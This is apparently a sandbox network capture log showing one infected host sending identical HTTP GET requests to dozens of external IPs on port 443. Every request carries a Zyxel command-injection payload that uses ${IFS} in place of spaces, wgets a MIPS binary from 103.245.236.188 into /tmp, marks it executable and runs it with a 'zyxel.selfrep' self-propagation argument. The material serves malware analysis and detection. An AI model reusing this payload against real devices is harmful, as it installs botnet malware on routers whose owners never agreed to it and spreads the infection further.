                                                Jan 12, 2024 18:24:26.616967916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2156192.168.2.1341542130.218.162.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617012024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2157192.168.2.1348712104.134.14.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617052078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2158192.168.2.1354382154.176.68.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617098093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2159192.168.2.1352914149.211.237.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617136002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2160192.168.2.1353066221.28.84.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617175102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2161192.168.2.1344450166.121.184.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617214918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2162192.168.2.135453893.79.195.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617248058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2163192.168.2.135615863.71.173.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617292881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2164192.168.2.1341946166.2.172.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617338896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2165192.168.2.1333986222.224.117.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617367983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2166192.168.2.134234272.171.39.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617391109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2167192.168.2.1345608182.42.172.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617441893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2168192.168.2.134147031.27.196.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617481947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2169192.168.2.135932654.122.253.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617518902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2170192.168.2.1338778128.164.17.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617537975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2171192.168.2.135386437.159.252.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617573023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2172192.168.2.1334460205.138.209.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617615938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2173192.168.2.1343928181.127.87.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617655993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2174192.168.2.133990836.230.145.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617682934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2175192.168.2.133341044.134.99.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617721081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2176192.168.2.133903866.66.184.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617775917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2177192.168.2.133410220.118.114.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617810011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2178192.168.2.1335974178.13.45.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617849112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2179192.168.2.136082844.202.29.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617878914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2180192.168.2.133522697.10.157.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617908001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2181192.168.2.1335186173.220.21.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.617958069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2182192.168.2.134241447.59.9.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618011951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2183192.168.2.134049497.204.190.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618036032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2184192.168.2.135042881.62.145.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618055105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2185192.168.2.1357384118.160.17.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618093967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2186192.168.2.1343398115.116.213.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618145943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2187192.168.2.1345012220.150.241.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618170977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2188192.168.2.135482040.219.99.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618206024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2189192.168.2.1348318119.253.254.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618257999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2190192.168.2.1343998140.70.206.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618328094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2191192.168.2.1335204193.67.3.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618344069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2192192.168.2.133571878.220.217.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618371010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2193192.168.2.134382685.185.213.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618422031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2194192.168.2.135792439.42.239.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618444920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2195192.168.2.135175087.151.115.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618473053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2196192.168.2.1353796103.209.36.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618505955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2197192.168.2.133785695.179.113.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618532896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2198192.168.2.134860465.72.202.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618591070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2199192.168.2.1343014102.230.209.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618654966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2200192.168.2.13573061.149.131.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618700981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2201192.168.2.133574874.204.227.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618720055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2202192.168.2.134616834.254.169.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618781090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2203192.168.2.1337752120.18.227.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618820906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2204192.168.2.1350128220.16.62.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618841887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2205192.168.2.1333736167.187.88.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618892908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2206192.168.2.1337020187.235.148.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618937969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2207192.168.2.135451869.238.87.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.618982077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2208192.168.2.134279276.176.45.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.619014978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2209192.168.2.133560241.242.106.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.619071007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2210192.168.2.13572604.137.124.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.619105101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2211192.168.2.1342412217.132.236.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.622807980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2212192.168.2.1333802185.6.93.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.622837067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2213192.168.2.135822818.192.219.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.622874975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2214192.168.2.1356492194.23.134.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.622921944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2215192.168.2.1346022169.16.141.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.622948885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2216192.168.2.134155696.210.191.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.622953892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2217192.168.2.135589036.103.32.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:26.623018980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2218192.168.2.1350804216.3.24.4443
                                                TimestampBytes transferredDirectionData
